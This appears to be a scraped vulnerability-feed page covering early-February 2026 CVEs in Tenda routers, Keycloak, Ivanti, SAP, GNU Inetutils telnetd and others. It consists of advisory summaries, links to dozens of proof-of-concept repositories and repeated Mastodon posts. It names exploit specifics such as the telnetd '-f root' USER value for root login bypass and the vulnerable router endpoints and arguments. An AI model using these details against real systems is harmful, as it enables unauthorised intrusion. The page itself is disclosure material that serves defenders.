(8.8 HIGH)

EPSS: 0.09%

updated 2026-02-10T19:29:09.960000

1 posts

A vulnerability was determined in Tenda TX9 up to 22.03.02.10_multi. Affected by this vulnerability is the function sub_432580 of the file /goform/fast_setting_wifi_set. This manipulation of the argument ssid causes buffer overflow. The attack may be initiated remotely. The exploit has been publicly disclosed and may be utilized.

thehackerwire@mastodon.social at 2026-02-08T07:17:12.000Z ##

🟠 CVE-2026-2139 - High (8.8)

A vulnerability was determined in Tenda TX9 up to 22.03.02.10_multi. Affected by this vulnerability is the function sub_432580 of the file /goform/fast_setting_wifi_set. This manipulation of the argument ssid causes buffer overflow. The attack may...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-1486
(8.8 HIGH)

EPSS: 0.04%

updated 2026-02-10T18:35:16

2 posts

A flaw was found in Keycloak. A vulnerability exists in the jwt-authorization-grant flow where the server fails to verify if an Identity Provider (IdP) is enabled before issuing tokens. The issuer lookup mechanism (lookupIdentityProviderFromIssuer) retrieves the IdP configuration but does not filter for isEnabled=false. If an administrator disables an IdP (e.g., due to a compromise or offboarding)

thehackerwire@mastodon.social at 2026-02-09T20:24:11.000Z ##

🟠 CVE-2026-1486 - High (8.8)

A flaw was found in Keycloak. A vulnerability exists in the jwt-authorization-grant flow where the server fails to verify if an Identity Provider (IdP) is enabled before issuing tokens. The issuer lookup mechanism (lookupIdentityProviderFromIssuer...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-09T20:23:50.000Z ##

🟠 CVE-2026-1486 - High (8.8)

A flaw was found in Keycloak. A vulnerability exists in the jwt-authorization-grant flow where the server fails to verify if an Identity Provider (IdP) is enabled before issuing tokens. The issuer lookup mechanism (lookupIdentityProviderFromIssuer...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-1603
(8.6 HIGH)

EPSS: 0.00%

updated 2026-02-10T18:30:49

2 posts

An authentication bypass in Ivanti Endpoint Manager before version 2024 SU5 allows a remote unauthenticated attacker to leak specific stored credential data.

AAKL at 2026-02-10T16:58:56.429Z ##

New.

Ivanti's vulnerabilities have been wreaking havoc in Europe.

Meanwhile:

Ivanti February 2026 Security Update ivanti.com/blog/february-2026-

The actual security advisory affecting CVE-2026-1602 and CVE-2026-1603 was posted yesterday:

Ivanti Security Advisory EPM February 2026 for EPM 2024 hub.ivanti.com/s/article/Secur

##

AAKL@infosec.exchange at 2026-02-10T16:58:56.000Z ##

New.

Ivanti's vulnerabilities have been wreaking havoc in Europe.

Meanwhile:

Ivanti February 2026 Security Update ivanti.com/blog/february-2026-

The actual security advisory affecting CVE-2026-1602 and CVE-2026-1603 was posted yesterday:

Ivanti Security Advisory EPM February 2026 for EPM 2024 hub.ivanti.com/s/article/Secur #Ivanti #infosec #vulnerability

##

CVE-2025-52436
(8.8 HIGH)

EPSS: 0.00%

updated 2026-02-10T18:30:40

1 posts

An Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability [CWE-79] vulnerability in Fortinet FortiSandbox 5.0.0 through 5.0.1, FortiSandbox 4.4.0 through 4.4.7, FortiSandbox 4.2 all versions, FortiSandbox 4.0 all versions may allow an unauthenticated attacker to execute commands via crafted requests.

CVE-2026-24061
(9.8 CRITICAL)

EPSS: 32.54%

updated 2026-02-10T18:30:34

4 posts

telnetd in GNU Inetutils through 2.7 allows remote authentication bypass via a "-f root" value for the USER environment variable.

Nuclei template

62 repos

https://github.com/monstertsl/CVE-2026-24061

https://github.com/franckferman/CVE_2026_24061_PoC

https://github.com/Good123321-bot/CVE-2026-24061-POC

https://github.com/Ali-brarou/telnest

https://github.com/canpilayda/inetutils-telnetd-cve-2026-24061

https://github.com/SystemVll/CVE-2026-24061

https://github.com/Good123321-bot/good123321-bot.github.io

https://github.com/midox008/CVE-2026-24061

https://github.com/LucasPDiniz/CVE-2026-24061

https://github.com/Gabs-hub/CVE-2026-24061_Lab

https://github.com/XsanFlip/CVE-2026-24061-Scanner

https://github.com/Moxxic1/moxxic1.github.io

https://github.com/buzz075/CVE-2026-24061

https://github.com/nrnw/CVE-2026-24061-GNU-inetutils-Telnet-Detector

https://github.com/infat0x/CVE-2026-24061

https://github.com/BrainBob/Telnet-TestVuln-CVE-2026-24061

https://github.com/Chocapikk/CVE-2026-24061

https://github.com/xuemian168/CVE-2026-24061

https://github.com/ms0x08-dev/CVE-2026-24061-POC

https://github.com/typeconfused/CVE-2026-24061

https://github.com/leonjza/inetutils-telnetd-auth-bypass

https://github.com/Moxxic1/Tell-Me-Root

https://github.com/cyberpoul/CVE-2026-24061-POC

https://github.com/duy-31/CVE-2026-24061---telnetd

https://github.com/obrunolima1910/CVE-2026-24061

https://github.com/Lingzesec/CVE-2026-24061-GUI

https://github.com/0x7556/CVE-2026-24061

https://github.com/SafeBreach-Labs/CVE-2026-24061

https://github.com/balgan/CVE-2026-24061

https://github.com/yanxinwu946/CVE-2026-24061--telnetd

https://github.com/Mr-Zapi/CVE-2026-24061

https://github.com/MY0723/GNU-Inetutils-telnet-CVE-2026-24061-

https://github.com/ridpath/Terrminus-CVE-2026-2406

https://github.com/Mefhika120/Ashwesker-CVE-2026-24061

https://github.com/JayGLXR/CVE-2026-24061-POC

https://github.com/ibrahmsql/CVE-2026-24061-PoC

https://github.com/r00tuser111/CVE-2026-24061

https://github.com/Parad0x7e/CVE-2026-24061

https://github.com/Alter-N0X/CVE-2026-24061-POC

https://github.com/z3n70/CVE-2026-24061

https://github.com/androidteacher/CVE-2026-24061-PoC-Telnetd

https://github.com/SeptembersEND/CVE--2026-24061

https://github.com/hilwa24/CVE-2026-24061

https://github.com/lavabyte/telnet-CVE-2026-24061

https://github.com/madfxr/Twenty-Three-Scanner

https://github.com/shivam-bathla/CVE-2026-24061-setup

https://github.com/X-croot/CVE-2026-24061_POC

https://github.com/BrainBob/CVE-2026-24061

https://github.com/scumfrog/cve-2026-24061

https://github.com/TryA9ain/CVE-2026-24061

https://github.com/dotelpenguin/telnetd_CVE-2026-24061_tester

https://github.com/hackingyseguridad/root

https://github.com/punitdarji/telnetd-cve-2026-24061

https://github.com/novitahk/Exploit-CVE-2026-24061

https://github.com/FurkanKAYAPINAR/CVE-2026-24061-telnet2root

https://github.com/m3ngx1ng/cve_2026_24061_cli

https://github.com/killsystema/scan-cve-2026-24061

https://github.com/cumakurt/tscan

https://github.com/0xXyc/telnet-inetutils-auth-bypass-CVE-2026-24061

https://github.com/obrunolima1910/obrunolima1910.github.io

https://github.com/h3athen/CVE-2026-24061

https://github.com/parameciumzhang/Tell-Me-Root

hrbrmstr@mastodon.social at 2026-02-10T20:38:58.000Z ##

I can't remember if I cried
When my `-f root` hit an ACL line
But something touched me deep inside…

The day the telnet died

On January 14, 2026, global telnet traffic observed by the GreyNoise Global Observation Grid fell off a cliff. A 59% sustained reduction, eighteen ASNs going completely silent, five countries vanishing (telnet-wise) from our data entirely. Six days later, CVE-2026-24061 dropped. Coincidence is one explanation.

labs.greynoise.io/grimoire/202

##

oversecurity@mastodon.social at 2026-02-10T15:20:05.000Z ##

~/CVE/CVE-2026-24061_telnetd

Analisi approfondita del CVE-2026-24061 telnetd exploit. Scopri come una mancata sanificazione in GNU InetUtils permetta l'ottenimento di privilegi...

🔗️ [Lobsec] link.is.it/6L9jY6

##

hrbrmstr@mastodon.social at 2026-02-10T20:38:58.000Z ##

I can't remember if I cried
When my `-f root` hit an ACL line
But something touched me deep inside…

The day the telnet died

On January 14, 2026, global telnet traffic observed by the GreyNoise Global Observation Grid fell off a cliff. A 59% sustained reduction, eighteen ASNs going completely silent, five countries vanishing (telnet-wise) from our data entirely. Six days later, CVE-2026-24061 dropped. Coincidence is one explanation.

labs.greynoise.io/grimoire/202

##

oversecurity@mastodon.social at 2026-02-10T15:20:05.000Z ##

~/CVE/CVE-2026-24061_telnetd

Analisi approfondita del CVE-2026-24061 telnetd exploit. Scopri come una mancata sanificazione in GNU InetUtils permetta l'ottenimento di privilegi...

🔗️ [Lobsec] link.is.it/6L9jY6

##

CVE-2025-70963
(7.6 HIGH)

EPSS: 0.04%

updated 2026-02-10T18:23:11.493000

1 posts

Gophish <=0.12.1 is vulnerable to Incorrect Access Control. The administrative dashboard exposes each user’s long-lived API key directly inside the rendered HTML/JavaScript of the page on every login. This makes permanent API credentials accessible to any script running in the browser context.

thehackerwire@mastodon.social at 2026-02-06T19:16:49.000Z ##

🟠 CVE-2025-70963 - High (7.6)

Gophish &lt;=0.12.1 is vulnerable to Incorrect Access Control. The administrative dashboard exposes each user’s long-lived API key directly inside the rendered HTML/JavaScript of the page on every login. This makes permanent API credentials acce...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-6967
(8.7 HIGH)

EPSS: 0.00%

updated 2026-02-10T15:30:34

4 posts

Execution After Redirect (EAR) vulnerability in Sarman Soft Software and Technology Services Industry and Trade Ltd. Co. CMS allows JSON Hijacking (aka JavaScript Hijacking), Authentication Bypass.This issue affects CMS: through 10022026. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.

thehackerwire@mastodon.social at 2026-02-10T14:18:47.000Z ##

🟠 CVE-2025-6967 - High (8.7)

Execution After Redirect (EAR) vulnerability in Sarman Soft Software and Technology Services Industry and Trade Ltd. Co. CMS allows JSON Hijacking (aka JavaScript Hijacking), Authentication Bypass.This issue affects CMS: through 10022026.

NOTE: T...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T14:18:21.000Z ##

🟠 CVE-2025-6967 - High (8.7)

Execution After Redirect (EAR) vulnerability in Sarman Soft Software and Technology Services Industry and Trade Ltd. Co. CMS allows JSON Hijacking (aka JavaScript Hijacking), Authentication Bypass.This issue affects CMS: through 10022026.

NOTE: T...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T14:18:47.000Z ##

🟠 CVE-2025-6967 - High (8.7)

Execution After Redirect (EAR) vulnerability in Sarman Soft Software and Technology Services Industry and Trade Ltd. Co. CMS allows JSON Hijacking (aka JavaScript Hijacking), Authentication Bypass.This issue affects CMS: through 10022026.

NOTE: T...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T14:18:21.000Z ##

🟠 CVE-2025-6967 - High (8.7)

Execution After Redirect (EAR) vulnerability in Sarman Soft Software and Technology Services Industry and Trade Ltd. Co. CMS allows JSON Hijacking (aka JavaScript Hijacking), Authentication Bypass.This issue affects CMS: through 10022026.

NOTE: T...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-2203
(8.8 HIGH)

EPSS: 0.09%

updated 2026-02-10T15:30:26

1 posts

A flaw has been found in Tenda AC8 16.03.33.05. Affected by this vulnerability is an unknown functionality of the file /goform/fast_setting_wifi_set of the component Embedded Httpd Service. This manipulation of the argument timeZone causes buffer overflow. Remote exploitation of the attack is possible. The exploit has been published and may be used.

thehackerwire@mastodon.social at 2026-02-09T03:17:17.000Z ##

🟠 CVE-2026-2203 - High (8.8)

A flaw has been found in Tenda AC8 16.03.33.05. Affected by this vulnerability is an unknown functionality of the file /goform/fast_setting_wifi_set of the component Embedded Httpd Service. This manipulation of the argument timeZone causes buffer ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-23687
(8.8 HIGH)

EPSS: 0.05%

updated 2026-02-10T15:22:54.740000

8 posts

SAP NetWeaver Application Server ABAP and ABAP Platform allows an authenticated attacker with normal privileges to obtain a valid signed message and send modified signed XML documents to the verifier. This may result in acceptance of tampered identity information, unauthorized access to sensitive user data and potential disruption of normal system usage.

DarkWebInformer at 2026-02-10T17:52:38.117Z ##

‼️ XML Signature Wrapping Vulnerability in SAP NetWeaver ABAP Enables Identity Tampering and Unauthorized Access (CVE-2026-23687)

darkwebinformer.com/xml-signat

##

thehackerwire@mastodon.social at 2026-02-10T04:22:30.000Z ##

🟠 CVE-2026-23687 - High (8.8)

SAP NetWeaver Application Server ABAP and ABAP Platform allows an authenticated attacker with normal privileges to obtain a valid signed message and send modified signed XML documents to the verifier. This may result in acceptance of tampered iden...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T04:21:55.000Z ##

🟠 CVE-2026-23687 - High (8.8)

SAP NetWeaver Application Server ABAP and ABAP Platform allows an authenticated attacker with normal privileges to obtain a valid signed message and send modified signed XML documents to the verifier. This may result in acceptance of tampered iden...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T04:21:03.000Z ##

🟠 CVE-2026-23687 - High (8.8)

SAP NetWeaver Application Server ABAP and ABAP Platform allows an authenticated attacker with normal privileges to obtain a valid signed message and send modified signed XML documents to the verifier. This may result in acceptance of tampered iden...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

DarkWebInformer@infosec.exchange at 2026-02-10T17:52:38.000Z ##

‼️ XML Signature Wrapping Vulnerability in SAP NetWeaver ABAP Enables Identity Tampering and Unauthorized Access (CVE-2026-23687)

darkwebinformer.com/xml-signat

##

thehackerwire@mastodon.social at 2026-02-10T04:22:30.000Z ##

🟠 CVE-2026-23687 - High (8.8)

SAP NetWeaver Application Server ABAP and ABAP Platform allows an authenticated attacker with normal privileges to obtain a valid signed message and send modified signed XML documents to the verifier. This may result in acceptance of tampered iden...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T04:21:55.000Z ##

🟠 CVE-2026-23687 - High (8.8)

SAP NetWeaver Application Server ABAP and ABAP Platform allows an authenticated attacker with normal privileges to obtain a valid signed message and send modified signed XML documents to the verifier. This may result in acceptance of tampered iden...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T04:21:03.000Z ##

🟠 CVE-2026-23687 - High (8.8)

SAP NetWeaver Application Server ABAP and ABAP Platform allows an authenticated attacker with normal privileges to obtain a valid signed message and send modified signed XML documents to the verifier. This may result in acceptance of tampered iden...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-23717
(7.8 HIGH)

EPSS: 0.01%

updated 2026-02-10T15:22:54.740000

2 posts

A vulnerability has been identified in Simcenter Femap (All versions < V2512), Simcenter Nastran (All versions < V2512). The affected applications contains an out of bounds read vulnerability while parsing specially crafted XDB files. This could allow an attacker to execute code in the context of the current process.

thehackerwire@mastodon.social at 2026-02-10T11:01:07.000Z ##

🟠 CVE-2026-23717 - High (7.8)

A vulnerability has been identified in Simcenter Femap (All versions &lt; V2512), Simcenter Nastran (All versions &lt; V2512). The affected applications contains an out of bounds read vulnerability while parsing specially crafted XDB files. This c...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T11:01:07.000Z ##

🟠 CVE-2026-23717 - High (7.8)

A vulnerability has been identified in Simcenter Femap (All versions &lt; V2512), Simcenter Nastran (All versions &lt; V2512). The affected applications contains an out of bounds read vulnerability while parsing specially crafted XDB files. This c...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-22923
(7.8 HIGH)

EPSS: 0.01%

updated 2026-02-10T15:22:54.740000

2 posts

A vulnerability has been identified in NX (All versions < V2512). The affected application contains a data validation vulnerability that could allow an attacker with local access to interfere with internal data during the PDF export process that could potentially lead to arbitrary code execution.

thehackerwire@mastodon.social at 2026-02-10T10:30:50.000Z ##

🟠 CVE-2026-22923 - High (7.8)

A vulnerability has been identified in NX (All versions &lt; V2512). The affected application contains a data validation vulnerability that could allow an attacker with local access to interfere with internal data during the PDF export process tha...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T10:30:50.000Z ##

🟠 CVE-2026-22923 - High (7.8)

A vulnerability has been identified in NX (All versions &lt; V2512). The affected application contains a data validation vulnerability that could allow an attacker with local access to interfere with internal data during the PDF export process tha...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-2268
(7.5 HIGH)

EPSS: 0.04%

updated 2026-02-10T15:22:54.740000

2 posts

The Ninja Forms plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.14.0. This is due to the unsafe application of the `ninja_forms_merge_tags` filter to user-supplied input within repeater fields, which allows the resolution of `{post_meta:KEY}` merge tags without authorization checks. This makes it possible for unauthenticated attackers to

1 repos

https://github.com/amusedx/CVE-2026-22686

thehackerwire@mastodon.social at 2026-02-10T10:16:49.000Z ##

🟠 CVE-2026-2268 - High (7.5)

The Ninja Forms plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.14.0. This is due to the unsafe application of the `ninja_forms_merge_tags` filter to user-supplied input within repeater ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T10:16:49.000Z ##

🟠 CVE-2026-2268 - High (7.5)

The Ninja Forms plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.14.0. This is due to the unsafe application of the `ninja_forms_merge_tags` filter to user-supplied input within repeater ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-2096
(9.8 CRITICAL)

EPSS: 0.13%

updated 2026-02-10T15:22:54.740000

7 posts

Agentflow developed by Flowring has a Missing Authentication vulnerability, allowing unauthenticated remote attackers to read, modify, and delete database contents by using a specific functionality.

offseq at 2026-02-10T07:30:30.109Z ##

🚨 CRITICAL vuln: CVE-2026-2096 in Flowring Agentflow (all versions). Unauthenticated attackers can read, modify, or delete DB contents due to authentication bypass. No fix yet — restrict access! radar.offseq.com/threat/cve-20

##

thehackerwire@mastodon.social at 2026-02-10T07:29:44.000Z ##

🔴 CVE-2026-2096 - Critical (9.8)

Agentflow developed by Flowring has a Missing Authentication vulnerability, allowing unauthenticated remote attackers to read, modify, and delete database contents by using a specific functionality.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T07:20:42.000Z ##

🔴 CVE-2026-2096 - Critical (9.8)

Agentflow developed by Flowring has a Missing Authentication vulnerability, allowing unauthenticated remote attackers to read, modify, and delete database contents by using a specific functionality.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T07:19:28.000Z ##

🔴 CVE-2026-2096 - Critical (9.8)

Agentflow developed by Flowring has a Missing Authentication vulnerability, allowing unauthenticated remote attackers to read, modify, and delete database contents by using a specific functionality.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T07:29:44.000Z ##

🔴 CVE-2026-2096 - Critical (9.8)

Agentflow developed by Flowring has a Missing Authentication vulnerability, allowing unauthenticated remote attackers to read, modify, and delete database contents by using a specific functionality.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T07:20:42.000Z ##

🔴 CVE-2026-2096 - Critical (9.8)

Agentflow developed by Flowring has a Missing Authentication vulnerability, allowing unauthenticated remote attackers to read, modify, and delete database contents by using a specific functionality.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T07:19:28.000Z ##

🔴 CVE-2026-2096 - Critical (9.8)

Agentflow developed by Flowring has a Missing Authentication vulnerability, allowing unauthenticated remote attackers to read, modify, and delete database contents by using a specific functionality.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-2093
(7.5 HIGH)

EPSS: 0.05%

updated 2026-02-10T15:22:54.740000

2 posts

Docpedia developed by Flowring has a SQL Injection vulnerability, allowing unauthenticated remote attackers to inject arbitrary SQL commands to read database contents.

thehackerwire@mastodon.social at 2026-02-10T07:19:43.000Z ##

🟠 CVE-2026-2093 - High (7.5)

Docpedia developed by Flowring has a SQL Injection vulnerability, allowing unauthenticated remote attackers to inject arbitrary SQL commands to read database contents.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T07:19:43.000Z ##

🟠 CVE-2026-2093 - High (7.5)

Docpedia developed by Flowring has a SQL Injection vulnerability, allowing unauthenticated remote attackers to inject arbitrary SQL commands to read database contents.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-24322
(7.7 HIGH)

EPSS: 0.03%

updated 2026-02-10T15:22:54.740000

4 posts

SAP Solution Tools Plug-In (ST-PI) contains a function module that does not perform the necessary authorization checks for authenticated users, allowing sensitive information to be disclosed. This vulnerability has a high impact on confidentiality and does not affect integrity or availability.

thehackerwire@mastodon.social at 2026-02-10T04:21:49.000Z ##

🟠 CVE-2026-24322 - High (7.7)

SAP Solution Tools Plug-In (ST-PI) contains a function module that does not perform the necessary authorization checks for authenticated users, allowing sensitive information to be disclosed. This vulnerability has a high impact on confidentiality...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T04:20:54.000Z ##

🟠 CVE-2026-24322 - High (7.7)

SAP Solution Tools Plug-In (ST-PI) contains a function module that does not perform the necessary authorization checks for authenticated users, allowing sensitive information to be disclosed. This vulnerability has a high impact on confidentiality...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T04:21:49.000Z ##

🟠 CVE-2026-24322 - High (7.7)

SAP Solution Tools Plug-In (ST-PI) contains a function module that does not perform the necessary authorization checks for authenticated users, allowing sensitive information to be disclosed. This vulnerability has a high impact on confidentiality...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T04:20:54.000Z ##

🟠 CVE-2026-24322 - High (7.7)

SAP Solution Tools Plug-In (ST-PI) contains a function module that does not perform the necessary authorization checks for authenticated users, allowing sensitive information to be disclosed. This vulnerability has a high impact on confidentiality...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-25893
(0 None)

EPSS: 0.20%

updated 2026-02-10T15:22:54.740000

1 posts

FUXA is a web-based Process Visualization (SCADA/HMI/Dashboard) software. Prior to 1.2.10, an authentication bypass vulnerability in FUXA allows an unauthenticated, remote attacker to gain administrative access via the heartbeat refresh API and execute arbitrary code on the server. This issue has been patched in FUXA version 1.2.10.

offseq at 2026-02-10T03:00:33.726Z ##

⚠️ CRITICAL: CVE-2026-25893 in frangoteam FUXA (<1.2.10) lets unauthenticated attackers gain admin rights via the heartbeat API & execute code. Immediate patching to 1.2.10+ is essential for all ICS/SCADA deployments. radar.offseq.com/threat/cve-20

##

CVE-2025-15310
(7.8 HIGH)

EPSS: 0.02%

updated 2026-02-10T15:22:54.740000

1 posts

Tanium addressed a local privilege escalation vulnerability in Patch Endpoint Tools.

thehackerwire@mastodon.social at 2026-02-10T00:19:10.000Z ##

🟠 CVE-2025-15310 - High (7.8)

Tanium addressed a local privilege escalation vulnerability in Patch Endpoint Tools.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-25807
(8.8 HIGH)

EPSS: 0.11%

updated 2026-02-10T15:22:54.740000

1 posts

ZAI Shell is an autonomous SysOps agent designed to navigate, repair, and secure complex environments. Prior to 9.0.3, the P2P terminal sharing feature (share start) opens a TCP socket on port 5757 without any authentication mechanism. Any remote attacker can connect to this port using a simple socket script. An attacker who connects to a ZAI-Shell P2P session running in --no-ai mode can send arbi

1 repos

https://github.com/ibrahmsql/CVE-2026-25807-Exploit

thehackerwire@mastodon.social at 2026-02-09T22:26:10.000Z ##

🟠 CVE-2026-25807 - High (8.8)

ZAI Shell is an autonomous SysOps agent designed to navigate, repair, and secure complex environments. Prior to 9.0.3, the P2P terminal sharing feature (share start) opens a TCP socket on port 5757 without any authentication mechanism. Any remote ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-25961
(7.5 HIGH)

EPSS: 0.01%

updated 2026-02-10T15:22:54.740000

1 posts

SumatraPDF is a multi-format reader for Windows. In 3.5.0 through 3.5.2, SumatraPDF's update mechanism disables TLS hostname verification (INTERNET_FLAG_IGNORE_CERT_CN_INVALID) and executes installers without signature checks. A network attacker with any valid TLS certificate (e.g., Let's Encrypt) can intercept the update check request, inject a malicious installer URL, and achieve arbitrary code

1 repos

https://github.com/mbanyamer/CVE-2026-25961-SumatraPDF-3.5.0---3.5.2-RCE

thehackerwire@mastodon.social at 2026-02-09T22:18:14.000Z ##

🟠 CVE-2026-25961 - High (7.5)

SumatraPDF is a multi-format reader for Windows. In 3.5.0 through 3.5.2, SumatraPDF's update mechanism disables TLS hostname verification (INTERNET_FLAG_IGNORE_CERT_CN_INVALID) and executes installers without signature checks. A network attacker w...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-2066
(8.8 HIGH)

EPSS: 0.04%

updated 2026-02-10T15:11:28.863000

1 posts

A weakness has been identified in UTT 进取 520W 1.7.7-180627. This affects the function strcpy of the file /goform/formIpGroupConfig. Executing a manipulation of the argument groupName can lead to buffer overflow. The attack can be launched remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respo

thehackerwire@mastodon.social at 2026-02-06T21:18:25.000Z ##

🟠 CVE-2026-2066 - High (8.8)

A weakness has been identified in UTT 进取 520W 1.7.7-180627. This affects the function strcpy of the file /goform/formIpGroupConfig. Executing a manipulation of the argument groupName can lead to buffer overflow. The attack can be launched remo...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-2202
(8.8 HIGH)

EPSS: 0.09%

updated 2026-02-10T15:07:30.390000

1 posts

A vulnerability was detected in Tenda AC8 16.03.33.05. Affected is the function fromSetWifiGusetBasic of the file /goform/WifiGuestSet of the component httpd. The manipulation of the argument shareSpeed results in buffer overflow. The attack may be launched remotely. The exploit is now public and may be used.

thehackerwire@mastodon.social at 2026-02-09T03:17:06.000Z ##

🟠 CVE-2026-2202 - High (8.8)

A vulnerability was detected in Tenda AC8 16.03.33.05. Affected is the function fromSetWifiGusetBasic of the file /goform/WifiGuestSet of the component httpd. The manipulation of the argument shareSpeed results in buffer overflow. The attack may b...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-24684
(7.5 HIGH)

EPSS: 0.04%

updated 2026-02-10T15:02:32.033000

2 posts

FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to 3.22.0, the RDPSND async playback thread can process queued PDUs after the channel is closed and internal state is freed, leading to a use after free in rdpsnd_treat_wave. This vulnerability is fixed in 3.22.0.

thehackerwire@mastodon.social at 2026-02-10T15:04:54.000Z ##

🟠 CVE-2026-24684 - High (7.5)

FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to 3.22.0, the RDPSND async playback thread can process queued PDUs after the channel is closed and internal state is freed, leading to a use after free in rdpsnd_treat_wave. T...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T15:04:54.000Z ##

🟠 CVE-2026-24684 - High (7.5)

FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to 3.22.0, the RDPSND async playback thread can process queued PDUs after the channel is closed and internal state is freed, leading to a use after free in rdpsnd_treat_wave. T...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-2185
(8.8 HIGH)

EPSS: 0.05%

updated 2026-02-10T14:54:35.470000

1 posts

A flaw has been found in Tenda RX3 16.03.13.11. This issue affects the function set_device_name of the file /goform/setBlackRule of the component MAC Filtering Configuration Endpoint. This manipulation of the argument devName/mac causes stack-based buffer overflow. The attack is possible to be carried out remotely. The exploit has been published and may be used.

7 repos

